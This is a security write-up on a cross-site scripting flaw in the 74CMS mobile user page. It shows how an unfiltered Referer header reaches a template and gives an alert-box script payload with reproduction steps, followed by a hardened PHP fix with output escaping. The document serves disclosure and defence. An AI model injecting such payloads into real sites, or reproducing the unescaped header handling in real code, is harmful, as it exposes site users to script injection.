74CMS wap_user.php XSS vulnerability
File /74cms/wap/wap_user.php:
45 elseif ($act == 'add_favorites')
46 {
47     require_once(QISHI_ROOT_PATH.'include/fun_personal.php');
48     $id=isset($_GET['id'])?trim($_GET['id']):exit("出错了");                // "an error occurred"; the branch needs an id parameter
49     $link[0]['text'] = "[返回上一页]";                                      // "[back to previous page]"
50     $link[0]['href'] = $_SERVER["HTTP_REFERER"];                            // client-supplied header copied verbatim, no filtering or escaping
51     $link[1]['text'] = "[查看收藏夹]";                                      // "[view favorites]"
52     $link[1]['href'] = 'wap_user.php?act=favorites';
53     if(add_favorites($id,$_SESSION['uid'])==0)
54     {
55         WapShowMsg("添加失败，收藏夹中已经存在此职位",0,$link);             // "add failed: this job is already in your favorites"
56     }
57     else
58     {
59         WapShowMsg("添加成功",2,$link);                                     // "added successfully"; both branches render $link
60     }
61 }
The garbled string literals are just GBK message text displayed in the wrong encoding and have nothing to do with the bug. Line 50 copies the Referer header into the "back" link without any filtering, and both branches (lines 55 and 59) then hand that link to WapShowMsg. The implementation of WapShowMsg:
function WapShowMsg($msg_detail, $msg_type = 0, $links = array())
{
    global $smarty;
    if (count($links) == 0)
    {
        // Default "back" link, only used when the caller passes no links
        $links[0]['text'] = '返回上一页';                                   // "back to previous page"
        $links[0]['href'] = 'javascript:history.go(-1)';
    }
    $smarty->assign('ur_here', '系统提示');                                 // "system notice"
    $smarty->assign('msg_type', $msg_type);
    $smarty->assign('msg_detail', $msg_detail);
    $smarty->assign('links', $links);                                       // unescaped; href values reach the template as-is
    $smarty->assign('default_url', $links[0]['href']);                      // the Referer value again
    $smarty->display('wap/wap-showmsg.htm');
    exit();
}
The value is assigned to the template with no escaping, so the template prints the raw Referer inside the link's href attribute. A Referer header carrying JavaScript is enough to trigger the bug; the following value closes the attribute and injects a script tag:
"><script>alert(1)</script>
To reproduce, send a request to wap_user.php?act=add_favorites with an id parameter and a logged-in session, setting the Referer header yourself (curl or an intercepting proxy). One caveat for real-world exploitability: modern browsers percent-encode characters such as ", < and > in the URL they send as Referer, so delivering the payload cross-site through a victim's browser is much harder than demonstrating it with a proxy; the server-side defect is the same either way.
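The fix has two independent parts, and a hardened version of lines 49 to 52 is shown below as an added example (it is not 74CMS code). It assumes the request host is available in $_SERVER['HTTP_HOST'] and that the wap/wap-showmsg.htm template prints each links[].href inside a double-quoted href attribute; the function names safe_back_href and attr are mine. The Referer is only accepted when it is an absolute http(s) URL on the same host, and every value is attribute-escaped on output, so even a raw Referer cannot break out of the attribute.

```php
<?php
// Added example, not 74CMS code. Assumptions: our host is in
// $_SERVER['HTTP_HOST']; the template prints href values inside href="...".

/**
 * Return the Referer only if it is an absolute http(s) URL whose host
 * matches ours; otherwise return the same fallback WapShowMsg uses.
 */
function safe_back_href(array $server, string $fallback = 'javascript:history.go(-1)'): string
{
    $ref = $server['HTTP_REFERER'] ?? '';
    if ($ref === '') {
        return $fallback;
    }
    $parts = parse_url($ref);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return $fallback;            // relative junk, the XSS payload, etc.
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return $fallback;            // rejects javascript:, data:, ...
    }
    // HTTP_HOST may carry a port; compare host names only.
    $ourHost = strtolower(explode(':', $server['HTTP_HOST'] ?? '')[0]);
    if ($ourHost === '' || strtolower($parts['host']) !== $ourHost) {
        return $fallback;            // off-site referer: do not link back to it
    }
    return $ref;
}

/** Escape a value for use inside a double-quoted HTML attribute. */
function attr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed request: the payload from the write-up arrives in Referer.
$server = [
    'HTTP_HOST'    => 'jobs.example.com',
    'HTTP_REFERER' => '"><script>alert(1)</script>',
];

$link = [];
$link[0]['text'] = '[返回上一页]';
$link[0]['href'] = safe_back_href($server);      // -> javascript:history.go(-1)
$link[1]['text'] = '[查看收藏夹]';
$link[1]['href'] = 'wap_user.php?act=favorites';

// What the template should emit: quotes and angle brackets are encoded,
// so even an unfiltered Referer stays inside the attribute.
foreach ($link as $l) {
    echo '<a href="' . attr($l['href']) . '">' . attr($l['text']) . "</a>\n";
}

// A same-origin referer is kept as-is.
$server['HTTP_REFERER'] = 'https://jobs.example.com/wap/wap_job.php?id=1';
echo safe_back_href($server), "\n";
```

Output escaping is the part that actually closes the attribute injection; in the Smarty template this is the escape modifier (for example {$links[0].href|escape}, whose default html mode calls htmlspecialchars with ENT_QUOTES). The same-origin check is extra hardening: it also stops the "back" link from pointing at an off-site or non-http URL, which escaping alone does not address.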